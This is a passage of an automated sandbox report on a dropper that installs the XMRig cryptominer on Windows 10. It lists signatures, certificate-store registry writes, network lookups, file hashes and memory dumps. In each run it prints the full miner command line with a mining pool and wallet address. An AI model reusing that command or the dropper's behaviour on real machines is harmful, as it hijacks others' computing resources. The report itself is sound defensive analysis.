memory/3960-34-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-35-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-36-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-37-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-38-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-39-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-40-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-41-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-42-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-43-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-44-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-45-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-46-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-47-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-48-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-49-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-50-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-51-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-52-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-53-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-54-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-55-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-56-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-57-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-58-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-59-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-60-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-61-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-62-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-63-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-64-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-65-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-66-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-67-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-68-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-69-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-70-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-71-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-72-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-73-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-74-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-75-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-76-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-77-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-78-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-79-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-80-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-81-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-82-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-83-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-84-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2164 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2164 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2252-16-0x000001E9223E0000-0x000001E922400000-memory.dmp
memory/2252-17-0x000001E923DE0000-0x000001E923E00000-memory.dmp
memory/2252-18-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-19-0x000001E923E00000-0x000001E923E20000-memory.dmp
memory/2252-20-0x000001E923E20000-0x000001E923E40000-memory.dmp
memory/2252-21-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-22-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-25-0x000001E923E20000-0x000001E923E40000-memory.dmp
memory/2252-24-0x000001E923E00000-0x000001E923E20000-memory.dmp
memory/2252-23-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-26-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-27-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-28-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-29-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-30-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-31-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-32-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-33-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-34-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-35-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-36-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-37-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-38-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-39-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-40-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-41-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-42-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-43-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-44-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-45-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-46-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-47-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-48-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-49-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-50-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-51-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-52-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-53-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-54-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-55-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-56-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-57-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-58-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-59-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-60-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-61-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-62-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-63-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-64-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-65-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-66-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-67-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-68-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-69-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-70-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-71-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-72-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-73-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-74-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-75-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-76-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-77-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-78-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-79-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-80-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-81-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-82-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-83-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-84-0x00007FF784160000-0x00007FF784C63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4120 wrote to memory of 2804 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4120 wrote to memory of 2804 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2804-16-0x000001BABCE30000-0x000001BABCE50000-memory.dmp
memory/2804-17-0x000001BABCE80000-0x000001BABCEA0000-memory.dmp
memory/2804-18-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-20-0x000001BABCEA0000-0x000001BABCEC0000-memory.dmp
memory/2804-19-0x000001BABE770000-0x000001BABE790000-memory.dmp
memory/2804-21-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
